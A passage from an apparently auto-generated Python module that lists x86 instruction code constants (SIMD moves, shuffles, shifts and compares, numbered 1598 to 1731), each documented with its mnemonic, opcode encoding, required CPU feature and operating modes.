``SSE2``
``16/32/64-bit``
"""
VEX_VMOVDQU_XMM_XMMM128: int = 1598
"""
``VMOVDQU xmm1, xmm2/m128``
``VEX.128.F3.0F.WIG 6F /r``
``AVX``
``16/32/64-bit``
"""
VEX_VMOVDQU_YMM_YMMM256: int = 1599
"""
``VMOVDQU ymm1, ymm2/m256``
``VEX.256.F3.0F.WIG 6F /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VMOVDQU32_XMM_K1Z_XMMM128: int = 1600
"""
``VMOVDQU32 xmm1 {k1}{z}, xmm2/m128``
``EVEX.128.F3.0F.W0 6F /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VMOVDQU32_YMM_K1Z_YMMM256: int = 1601
"""
``VMOVDQU32 ymm1 {k1}{z}, ymm2/m256``
``EVEX.256.F3.0F.W0 6F /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VMOVDQU32_ZMM_K1Z_ZMMM512: int = 1602
"""
``VMOVDQU32 zmm1 {k1}{z}, zmm2/m512``
``EVEX.512.F3.0F.W0 6F /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VMOVDQU64_XMM_K1Z_XMMM128: int = 1603
"""
``VMOVDQU64 xmm1 {k1}{z}, xmm2/m128``
``EVEX.128.F3.0F.W1 6F /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VMOVDQU64_YMM_K1Z_YMMM256: int = 1604
"""
``VMOVDQU64 ymm1 {k1}{z}, ymm2/m256``
``EVEX.256.F3.0F.W1 6F /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VMOVDQU64_ZMM_K1Z_ZMMM512: int = 1605
"""
``VMOVDQU64 zmm1 {k1}{z}, zmm2/m512``
``EVEX.512.F3.0F.W1 6F /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VMOVDQU8_XMM_K1Z_XMMM128: int = 1606
"""
``VMOVDQU8 xmm1 {k1}{z}, xmm2/m128``
``EVEX.128.F2.0F.W0 6F /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VMOVDQU8_YMM_K1Z_YMMM256: int = 1607
"""
``VMOVDQU8 ymm1 {k1}{z}, ymm2/m256``
``EVEX.256.F2.0F.W0 6F /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VMOVDQU8_ZMM_K1Z_ZMMM512: int = 1608
"""
``VMOVDQU8 zmm1 {k1}{z}, zmm2/m512``
``EVEX.512.F2.0F.W0 6F /r``
``AVX512BW``
``16/32/64-bit``
"""
EVEX_VMOVDQU16_XMM_K1Z_XMMM128: int = 1609
"""
``VMOVDQU16 xmm1 {k1}{z}, xmm2/m128``
``EVEX.128.F2.0F.W1 6F /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VMOVDQU16_YMM_K1Z_YMMM256: int = 1610
"""
``VMOVDQU16 ymm1 {k1}{z}, ymm2/m256``
``EVEX.256.F2.0F.W1 6F /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VMOVDQU16_ZMM_K1Z_ZMMM512: int = 1611
"""
``VMOVDQU16 zmm1 {k1}{z}, zmm2/m512``
``EVEX.512.F2.0F.W1 6F /r``
``AVX512BW``
``16/32/64-bit``
"""
PSHUFW_MM_MMM64_IMM8: int = 1612
"""
``PSHUFW mm1, mm2/m64, imm8``
``NP 0F 70 /r ib``
``SSE``
``16/32/64-bit``
"""
PSHUFD_XMM_XMMM128_IMM8: int = 1613
"""
``PSHUFD xmm1, xmm2/m128, imm8``
``66 0F 70 /r ib``
``SSE2``
``16/32/64-bit``
"""
VEX_VPSHUFD_XMM_XMMM128_IMM8: int = 1614
"""
``VPSHUFD xmm1, xmm2/m128, imm8``
``VEX.128.66.0F.WIG 70 /r ib``
``AVX``
``16/32/64-bit``
"""
VEX_VPSHUFD_YMM_YMMM256_IMM8: int = 1615
"""
``VPSHUFD ymm1, ymm2/m256, imm8``
``VEX.256.66.0F.WIG 70 /r ib``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPSHUFD_XMM_K1Z_XMMM128B32_IMM8: int = 1616
"""
``VPSHUFD xmm1 {k1}{z}, xmm2/m128/m32bcst, imm8``
``EVEX.128.66.0F.W0 70 /r ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPSHUFD_YMM_K1Z_YMMM256B32_IMM8: int = 1617
"""
``VPSHUFD ymm1 {k1}{z}, ymm2/m256/m32bcst, imm8``
``EVEX.256.66.0F.W0 70 /r ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPSHUFD_ZMM_K1Z_ZMMM512B32_IMM8: int = 1618
"""
``VPSHUFD zmm1 {k1}{z}, zmm2/m512/m32bcst, imm8``
``EVEX.512.66.0F.W0 70 /r ib``
``AVX512F``
``16/32/64-bit``
"""
PSHUFHW_XMM_XMMM128_IMM8: int = 1619
"""
``PSHUFHW xmm1, xmm2/m128, imm8``
``F3 0F 70 /r ib``
``SSE2``
``16/32/64-bit``
"""
VEX_VPSHUFHW_XMM_XMMM128_IMM8: int = 1620
"""
``VPSHUFHW xmm1, xmm2/m128, imm8``
``VEX.128.F3.0F.WIG 70 /r ib``
``AVX``
``16/32/64-bit``
"""
VEX_VPSHUFHW_YMM_YMMM256_IMM8: int = 1621
"""
``VPSHUFHW ymm1, ymm2/m256, imm8``
``VEX.256.F3.0F.WIG 70 /r ib``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPSHUFHW_XMM_K1Z_XMMM128_IMM8: int = 1622
"""
``VPSHUFHW xmm1 {k1}{z}, xmm2/m128, imm8``
``EVEX.128.F3.0F.WIG 70 /r ib``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPSHUFHW_YMM_K1Z_YMMM256_IMM8: int = 1623
"""
``VPSHUFHW ymm1 {k1}{z}, ymm2/m256, imm8``
``EVEX.256.F3.0F.WIG 70 /r ib``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPSHUFHW_ZMM_K1Z_ZMMM512_IMM8: int = 1624
"""
``VPSHUFHW zmm1 {k1}{z}, zmm2/m512, imm8``
``EVEX.512.F3.0F.WIG 70 /r ib``
``AVX512BW``
``16/32/64-bit``
"""
PSHUFLW_XMM_XMMM128_IMM8: int = 1625
"""
``PSHUFLW xmm1, xmm2/m128, imm8``
``F2 0F 70 /r ib``
``SSE2``
``16/32/64-bit``
"""
VEX_VPSHUFLW_XMM_XMMM128_IMM8: int = 1626
"""
``VPSHUFLW xmm1, xmm2/m128, imm8``
``VEX.128.F2.0F.WIG 70 /r ib``
``AVX``
``16/32/64-bit``
"""
VEX_VPSHUFLW_YMM_YMMM256_IMM8: int = 1627
"""
``VPSHUFLW ymm1, ymm2/m256, imm8``
``VEX.256.F2.0F.WIG 70 /r ib``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPSHUFLW_XMM_K1Z_XMMM128_IMM8: int = 1628
"""
``VPSHUFLW xmm1 {k1}{z}, xmm2/m128, imm8``
``EVEX.128.F2.0F.WIG 70 /r ib``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPSHUFLW_YMM_K1Z_YMMM256_IMM8: int = 1629
"""
``VPSHUFLW ymm1 {k1}{z}, ymm2/m256, imm8``
``EVEX.256.F2.0F.WIG 70 /r ib``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPSHUFLW_ZMM_K1Z_ZMMM512_IMM8: int = 1630
"""
``VPSHUFLW zmm1 {k1}{z}, zmm2/m512, imm8``
``EVEX.512.F2.0F.WIG 70 /r ib``
``AVX512BW``
``16/32/64-bit``
"""
PSRLW_MM_IMM8: int = 1631
"""
``PSRLW mm, imm8``
``NP 0F 71 /2 ib``
``MMX``
``16/32/64-bit``
"""
PSRLW_XMM_IMM8: int = 1632
"""
``PSRLW xmm1, imm8``
``66 0F 71 /2 ib``
``SSE2``
``16/32/64-bit``
"""
VEX_VPSRLW_XMM_XMM_IMM8: int = 1633
"""
``VPSRLW xmm1, xmm2, imm8``
``VEX.128.66.0F.WIG 71 /2 ib``
``AVX``
``16/32/64-bit``
"""
VEX_VPSRLW_YMM_YMM_IMM8: int = 1634
"""
``VPSRLW ymm1, ymm2, imm8``
``VEX.256.66.0F.WIG 71 /2 ib``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPSRLW_XMM_K1Z_XMMM128_IMM8: int = 1635
"""
``VPSRLW xmm1 {k1}{z}, xmm2/m128, imm8``
``EVEX.128.66.0F.WIG 71 /2 ib``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPSRLW_YMM_K1Z_YMMM256_IMM8: int = 1636
"""
``VPSRLW ymm1 {k1}{z}, ymm2/m256, imm8``
``EVEX.256.66.0F.WIG 71 /2 ib``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPSRLW_ZMM_K1Z_ZMMM512_IMM8: int = 1637
"""
``VPSRLW zmm1 {k1}{z}, zmm2/m512, imm8``
``EVEX.512.66.0F.WIG 71 /2 ib``
``AVX512BW``
``16/32/64-bit``
"""
PSRAW_MM_IMM8: int = 1638
"""
``PSRAW mm, imm8``
``NP 0F 71 /4 ib``
``MMX``
``16/32/64-bit``
"""
PSRAW_XMM_IMM8: int = 1639
"""
``PSRAW xmm1, imm8``
``66 0F 71 /4 ib``
``SSE2``
``16/32/64-bit``
"""
VEX_VPSRAW_XMM_XMM_IMM8: int = 1640
"""
``VPSRAW xmm1, xmm2, imm8``
``VEX.128.66.0F.WIG 71 /4 ib``
``AVX``
``16/32/64-bit``
"""
VEX_VPSRAW_YMM_YMM_IMM8: int = 1641
"""
``VPSRAW ymm1, ymm2, imm8``
``VEX.256.66.0F.WIG 71 /4 ib``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPSRAW_XMM_K1Z_XMMM128_IMM8: int = 1642
"""
``VPSRAW xmm1 {k1}{z}, xmm2/m128, imm8``
``EVEX.128.66.0F.WIG 71 /4 ib``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPSRAW_YMM_K1Z_YMMM256_IMM8: int = 1643
"""
``VPSRAW ymm1 {k1}{z}, ymm2/m256, imm8``
``EVEX.256.66.0F.WIG 71 /4 ib``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPSRAW_ZMM_K1Z_ZMMM512_IMM8: int = 1644
"""
``VPSRAW zmm1 {k1}{z}, zmm2/m512, imm8``
``EVEX.512.66.0F.WIG 71 /4 ib``
``AVX512BW``
``16/32/64-bit``
"""
PSLLW_MM_IMM8: int = 1645
"""
``PSLLW mm1, imm8``
``NP 0F 71 /6 ib``
``MMX``
``16/32/64-bit``
"""
PSLLW_XMM_IMM8: int = 1646
"""
``PSLLW xmm1, imm8``
``66 0F 71 /6 ib``
``SSE2``
``16/32/64-bit``
"""
VEX_VPSLLW_XMM_XMM_IMM8: int = 1647
"""
``VPSLLW xmm1, xmm2, imm8``
``VEX.128.66.0F.WIG 71 /6 ib``
``AVX``
``16/32/64-bit``
"""
VEX_VPSLLW_YMM_YMM_IMM8: int = 1648
"""
``VPSLLW ymm1, ymm2, imm8``
``VEX.256.66.0F.WIG 71 /6 ib``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPSLLW_XMM_K1Z_XMMM128_IMM8: int = 1649
"""
``VPSLLW xmm1 {k1}{z}, xmm2/m128, imm8``
``EVEX.128.66.0F.WIG 71 /6 ib``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPSLLW_YMM_K1Z_YMMM256_IMM8: int = 1650
"""
``VPSLLW ymm1 {k1}{z}, ymm2/m256, imm8``
``EVEX.256.66.0F.WIG 71 /6 ib``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPSLLW_ZMM_K1Z_ZMMM512_IMM8: int = 1651
"""
``VPSLLW zmm1 {k1}{z}, zmm2/m512, imm8``
``EVEX.512.66.0F.WIG 71 /6 ib``
``AVX512BW``
``16/32/64-bit``
"""
EVEX_VPRORD_XMM_K1Z_XMMM128B32_IMM8: int = 1652
"""
``VPRORD xmm1 {k1}{z}, xmm2/m128/m32bcst, imm8``
``EVEX.128.66.0F.W0 72 /0 ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPRORD_YMM_K1Z_YMMM256B32_IMM8: int = 1653
"""
``VPRORD ymm1 {k1}{z}, ymm2/m256/m32bcst, imm8``
``EVEX.256.66.0F.W0 72 /0 ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPRORD_ZMM_K1Z_ZMMM512B32_IMM8: int = 1654
"""
``VPRORD zmm1 {k1}{z}, zmm2/m512/m32bcst, imm8``
``EVEX.512.66.0F.W0 72 /0 ib``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPRORQ_XMM_K1Z_XMMM128B64_IMM8: int = 1655
"""
``VPRORQ xmm1 {k1}{z}, xmm2/m128/m64bcst, imm8``
``EVEX.128.66.0F.W1 72 /0 ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPRORQ_YMM_K1Z_YMMM256B64_IMM8: int = 1656
"""
``VPRORQ ymm1 {k1}{z}, ymm2/m256/m64bcst, imm8``
``EVEX.256.66.0F.W1 72 /0 ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPRORQ_ZMM_K1Z_ZMMM512B64_IMM8: int = 1657
"""
``VPRORQ zmm1 {k1}{z}, zmm2/m512/m64bcst, imm8``
``EVEX.512.66.0F.W1 72 /0 ib``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPROLD_XMM_K1Z_XMMM128B32_IMM8: int = 1658
"""
``VPROLD xmm1 {k1}{z}, xmm2/m128/m32bcst, imm8``
``EVEX.128.66.0F.W0 72 /1 ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPROLD_YMM_K1Z_YMMM256B32_IMM8: int = 1659
"""
``VPROLD ymm1 {k1}{z}, ymm2/m256/m32bcst, imm8``
``EVEX.256.66.0F.W0 72 /1 ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPROLD_ZMM_K1Z_ZMMM512B32_IMM8: int = 1660
"""
``VPROLD zmm1 {k1}{z}, zmm2/m512/m32bcst, imm8``
``EVEX.512.66.0F.W0 72 /1 ib``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPROLQ_XMM_K1Z_XMMM128B64_IMM8: int = 1661
"""
``VPROLQ xmm1 {k1}{z}, xmm2/m128/m64bcst, imm8``
``EVEX.128.66.0F.W1 72 /1 ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPROLQ_YMM_K1Z_YMMM256B64_IMM8: int = 1662
"""
``VPROLQ ymm1 {k1}{z}, ymm2/m256/m64bcst, imm8``
``EVEX.256.66.0F.W1 72 /1 ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPROLQ_ZMM_K1Z_ZMMM512B64_IMM8: int = 1663
"""
``VPROLQ zmm1 {k1}{z}, zmm2/m512/m64bcst, imm8``
``EVEX.512.66.0F.W1 72 /1 ib``
``AVX512F``
``16/32/64-bit``
"""
PSRLD_MM_IMM8: int = 1664
"""
``PSRLD mm, imm8``
``NP 0F 72 /2 ib``
``MMX``
``16/32/64-bit``
"""
PSRLD_XMM_IMM8: int = 1665
"""
``PSRLD xmm1, imm8``
``66 0F 72 /2 ib``
``SSE2``
``16/32/64-bit``
"""
VEX_VPSRLD_XMM_XMM_IMM8: int = 1666
"""
``VPSRLD xmm1, xmm2, imm8``
``VEX.128.66.0F.WIG 72 /2 ib``
``AVX``
``16/32/64-bit``
"""
VEX_VPSRLD_YMM_YMM_IMM8: int = 1667
"""
``VPSRLD ymm1, ymm2, imm8``
``VEX.256.66.0F.WIG 72 /2 ib``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPSRLD_XMM_K1Z_XMMM128B32_IMM8: int = 1668
"""
``VPSRLD xmm1 {k1}{z}, xmm2/m128/m32bcst, imm8``
``EVEX.128.66.0F.W0 72 /2 ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPSRLD_YMM_K1Z_YMMM256B32_IMM8: int = 1669
"""
``VPSRLD ymm1 {k1}{z}, ymm2/m256/m32bcst, imm8``
``EVEX.256.66.0F.W0 72 /2 ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPSRLD_ZMM_K1Z_ZMMM512B32_IMM8: int = 1670
"""
``VPSRLD zmm1 {k1}{z}, zmm2/m512/m32bcst, imm8``
``EVEX.512.66.0F.W0 72 /2 ib``
``AVX512F``
``16/32/64-bit``
"""
PSRAD_MM_IMM8: int = 1671
"""
``PSRAD mm, imm8``
``NP 0F 72 /4 ib``
``MMX``
``16/32/64-bit``
"""
PSRAD_XMM_IMM8: int = 1672
"""
``PSRAD xmm1, imm8``
``66 0F 72 /4 ib``
``SSE2``
``16/32/64-bit``
"""
VEX_VPSRAD_XMM_XMM_IMM8: int = 1673
"""
``VPSRAD xmm1, xmm2, imm8``
``VEX.128.66.0F.WIG 72 /4 ib``
``AVX``
``16/32/64-bit``
"""
VEX_VPSRAD_YMM_YMM_IMM8: int = 1674
"""
``VPSRAD ymm1, ymm2, imm8``
``VEX.256.66.0F.WIG 72 /4 ib``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPSRAD_XMM_K1Z_XMMM128B32_IMM8: int = 1675
"""
``VPSRAD xmm1 {k1}{z}, xmm2/m128/m32bcst, imm8``
``EVEX.128.66.0F.W0 72 /4 ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPSRAD_YMM_K1Z_YMMM256B32_IMM8: int = 1676
"""
``VPSRAD ymm1 {k1}{z}, ymm2/m256/m32bcst, imm8``
``EVEX.256.66.0F.W0 72 /4 ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPSRAD_ZMM_K1Z_ZMMM512B32_IMM8: int = 1677
"""
``VPSRAD zmm1 {k1}{z}, zmm2/m512/m32bcst, imm8``
``EVEX.512.66.0F.W0 72 /4 ib``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPSRAQ_XMM_K1Z_XMMM128B64_IMM8: int = 1678
"""
``VPSRAQ xmm1 {k1}{z}, xmm2/m128/m64bcst, imm8``
``EVEX.128.66.0F.W1 72 /4 ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPSRAQ_YMM_K1Z_YMMM256B64_IMM8: int = 1679
"""
``VPSRAQ ymm1 {k1}{z}, ymm2/m256/m64bcst, imm8``
``EVEX.256.66.0F.W1 72 /4 ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPSRAQ_ZMM_K1Z_ZMMM512B64_IMM8: int = 1680
"""
``VPSRAQ zmm1 {k1}{z}, zmm2/m512/m64bcst, imm8``
``EVEX.512.66.0F.W1 72 /4 ib``
``AVX512F``
``16/32/64-bit``
"""
PSLLD_MM_IMM8: int = 1681
"""
``PSLLD mm, imm8``
``NP 0F 72 /6 ib``
``MMX``
``16/32/64-bit``
"""
PSLLD_XMM_IMM8: int = 1682
"""
``PSLLD xmm1, imm8``
``66 0F 72 /6 ib``
``SSE2``
``16/32/64-bit``
"""
VEX_VPSLLD_XMM_XMM_IMM8: int = 1683
"""
``VPSLLD xmm1, xmm2, imm8``
``VEX.128.66.0F.WIG 72 /6 ib``
``AVX``
``16/32/64-bit``
"""
VEX_VPSLLD_YMM_YMM_IMM8: int = 1684
"""
``VPSLLD ymm1, ymm2, imm8``
``VEX.256.66.0F.WIG 72 /6 ib``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPSLLD_XMM_K1Z_XMMM128B32_IMM8: int = 1685
"""
``VPSLLD xmm1 {k1}{z}, xmm2/m128/m32bcst, imm8``
``EVEX.128.66.0F.W0 72 /6 ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPSLLD_YMM_K1Z_YMMM256B32_IMM8: int = 1686
"""
``VPSLLD ymm1 {k1}{z}, ymm2/m256/m32bcst, imm8``
``EVEX.256.66.0F.W0 72 /6 ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPSLLD_ZMM_K1Z_ZMMM512B32_IMM8: int = 1687
"""
``VPSLLD zmm1 {k1}{z}, zmm2/m512/m32bcst, imm8``
``EVEX.512.66.0F.W0 72 /6 ib``
``AVX512F``
``16/32/64-bit``
"""
PSRLQ_MM_IMM8: int = 1688
"""
``PSRLQ mm, imm8``
``NP 0F 73 /2 ib``
``MMX``
``16/32/64-bit``
"""
PSRLQ_XMM_IMM8: int = 1689
"""
``PSRLQ xmm1, imm8``
``66 0F 73 /2 ib``
``SSE2``
``16/32/64-bit``
"""
VEX_VPSRLQ_XMM_XMM_IMM8: int = 1690
"""
``VPSRLQ xmm1, xmm2, imm8``
``VEX.128.66.0F.WIG 73 /2 ib``
``AVX``
``16/32/64-bit``
"""
VEX_VPSRLQ_YMM_YMM_IMM8: int = 1691
"""
``VPSRLQ ymm1, ymm2, imm8``
``VEX.256.66.0F.WIG 73 /2 ib``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPSRLQ_XMM_K1Z_XMMM128B64_IMM8: int = 1692
"""
``VPSRLQ xmm1 {k1}{z}, xmm2/m128/m64bcst, imm8``
``EVEX.128.66.0F.W1 73 /2 ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPSRLQ_YMM_K1Z_YMMM256B64_IMM8: int = 1693
"""
``VPSRLQ ymm1 {k1}{z}, ymm2/m256/m64bcst, imm8``
``EVEX.256.66.0F.W1 73 /2 ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPSRLQ_ZMM_K1Z_ZMMM512B64_IMM8: int = 1694
"""
``VPSRLQ zmm1 {k1}{z}, zmm2/m512/m64bcst, imm8``
``EVEX.512.66.0F.W1 73 /2 ib``
``AVX512F``
``16/32/64-bit``
"""
PSRLDQ_XMM_IMM8: int = 1695
"""
``PSRLDQ xmm1, imm8``
``66 0F 73 /3 ib``
``SSE2``
``16/32/64-bit``
"""
VEX_VPSRLDQ_XMM_XMM_IMM8: int = 1696
"""
``VPSRLDQ xmm1, xmm2, imm8``
``VEX.128.66.0F.WIG 73 /3 ib``
``AVX``
``16/32/64-bit``
"""
VEX_VPSRLDQ_YMM_YMM_IMM8: int = 1697
"""
``VPSRLDQ ymm1, ymm2, imm8``
``VEX.256.66.0F.WIG 73 /3 ib``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPSRLDQ_XMM_XMMM128_IMM8: int = 1698
"""
``VPSRLDQ xmm1, xmm2/m128, imm8``
``EVEX.128.66.0F.WIG 73 /3 ib``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPSRLDQ_YMM_YMMM256_IMM8: int = 1699
"""
``VPSRLDQ ymm1, ymm2/m256, imm8``
``EVEX.256.66.0F.WIG 73 /3 ib``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPSRLDQ_ZMM_ZMMM512_IMM8: int = 1700
"""
``VPSRLDQ zmm1, zmm2/m512, imm8``
``EVEX.512.66.0F.WIG 73 /3 ib``
``AVX512BW``
``16/32/64-bit``
"""
PSLLQ_MM_IMM8: int = 1701
"""
``PSLLQ mm, imm8``
``NP 0F 73 /6 ib``
``MMX``
``16/32/64-bit``
"""
PSLLQ_XMM_IMM8: int = 1702
"""
``PSLLQ xmm1, imm8``
``66 0F 73 /6 ib``
``SSE2``
``16/32/64-bit``
"""
VEX_VPSLLQ_XMM_XMM_IMM8: int = 1703
"""
``VPSLLQ xmm1, xmm2, imm8``
``VEX.128.66.0F.WIG 73 /6 ib``
``AVX``
``16/32/64-bit``
"""
VEX_VPSLLQ_YMM_YMM_IMM8: int = 1704
"""
``VPSLLQ ymm1, ymm2, imm8``
``VEX.256.66.0F.WIG 73 /6 ib``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPSLLQ_XMM_K1Z_XMMM128B64_IMM8: int = 1705
"""
``VPSLLQ xmm1 {k1}{z}, xmm2/m128/m64bcst, imm8``
``EVEX.128.66.0F.W1 73 /6 ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPSLLQ_YMM_K1Z_YMMM256B64_IMM8: int = 1706
"""
``VPSLLQ ymm1 {k1}{z}, ymm2/m256/m64bcst, imm8``
``EVEX.256.66.0F.W1 73 /6 ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPSLLQ_ZMM_K1Z_ZMMM512B64_IMM8: int = 1707
"""
``VPSLLQ zmm1 {k1}{z}, zmm2/m512/m64bcst, imm8``
``EVEX.512.66.0F.W1 73 /6 ib``
``AVX512F``
``16/32/64-bit``
"""
PSLLDQ_XMM_IMM8: int = 1708
"""
``PSLLDQ xmm1, imm8``
``66 0F 73 /7 ib``
``SSE2``
``16/32/64-bit``
"""
VEX_VPSLLDQ_XMM_XMM_IMM8: int = 1709
"""
``VPSLLDQ xmm1, xmm2, imm8``
``VEX.128.66.0F.WIG 73 /7 ib``
``AVX``
``16/32/64-bit``
"""
VEX_VPSLLDQ_YMM_YMM_IMM8: int = 1710
"""
``VPSLLDQ ymm1, ymm2, imm8``
``VEX.256.66.0F.WIG 73 /7 ib``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPSLLDQ_XMM_XMMM128_IMM8: int = 1711
"""
``VPSLLDQ xmm1, xmm2/m128, imm8``
``EVEX.128.66.0F.WIG 73 /7 ib``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPSLLDQ_YMM_YMMM256_IMM8: int = 1712
"""
``VPSLLDQ ymm1, ymm2/m256, imm8``
``EVEX.256.66.0F.WIG 73 /7 ib``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPSLLDQ_ZMM_ZMMM512_IMM8: int = 1713
"""
``VPSLLDQ zmm1, zmm2/m512, imm8``
``EVEX.512.66.0F.WIG 73 /7 ib``
``AVX512BW``
``16/32/64-bit``
"""
PCMPEQB_MM_MMM64: int = 1714
"""
``PCMPEQB mm, mm/m64``
``NP 0F 74 /r``
``MMX``
``16/32/64-bit``
"""
PCMPEQB_XMM_XMMM128: int = 1715
"""
``PCMPEQB xmm1, xmm2/m128``
``66 0F 74 /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VPCMPEQB_XMM_XMM_XMMM128: int = 1716
"""
``VPCMPEQB xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG 74 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPCMPEQB_YMM_YMM_YMMM256: int = 1717
"""
``VPCMPEQB ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F.WIG 74 /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPCMPEQB_KR_K1_XMM_XMMM128: int = 1718
"""
``VPCMPEQB k1 {k2}, xmm2, xmm3/m128``
``EVEX.128.66.0F.WIG 74 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPCMPEQB_KR_K1_YMM_YMMM256: int = 1719
"""
``VPCMPEQB k1 {k2}, ymm2, ymm3/m256``
``EVEX.256.66.0F.WIG 74 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPCMPEQB_KR_K1_ZMM_ZMMM512: int = 1720
"""
``VPCMPEQB k1 {k2}, zmm2, zmm3/m512``
``EVEX.512.66.0F.WIG 74 /r``
``AVX512BW``
``16/32/64-bit``
"""
PCMPEQW_MM_MMM64: int = 1721
"""
``PCMPEQW mm, mm/m64``
``NP 0F 75 /r``
``MMX``
``16/32/64-bit``
"""
PCMPEQW_XMM_XMMM128: int = 1722
"""
``PCMPEQW xmm1, xmm2/m128``
``66 0F 75 /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VPCMPEQW_XMM_XMM_XMMM128: int = 1723
"""
``VPCMPEQW xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG 75 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPCMPEQW_YMM_YMM_YMMM256: int = 1724
"""
``VPCMPEQW ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F.WIG 75 /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPCMPEQW_KR_K1_XMM_XMMM128: int = 1725
"""
``VPCMPEQW k1 {k2}, xmm2, xmm3/m128``
``EVEX.128.66.0F.WIG 75 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPCMPEQW_KR_K1_YMM_YMMM256: int = 1726
"""
``VPCMPEQW k1 {k2}, ymm2, ymm3/m256``
``EVEX.256.66.0F.WIG 75 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPCMPEQW_KR_K1_ZMM_ZMMM512: int = 1727
"""
``VPCMPEQW k1 {k2}, zmm2, zmm3/m512``
``EVEX.512.66.0F.WIG 75 /r``
``AVX512BW``
``16/32/64-bit``
"""
PCMPEQD_MM_MMM64: int = 1728
"""
``PCMPEQD mm, mm/m64``
``NP 0F 76 /r``
``MMX``
``16/32/64-bit``
"""
PCMPEQD_XMM_XMMM128: int = 1729
"""
``PCMPEQD xmm1, xmm2/m128``
``66 0F 76 /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VPCMPEQD_XMM_XMM_XMMM128: int = 1730
"""
``VPCMPEQD xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG 76 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPCMPEQD_YMM_YMM_YMMM256: int = 1731
"""
``VPCMPEQD ymm1, ymm2, ymm3/m256``
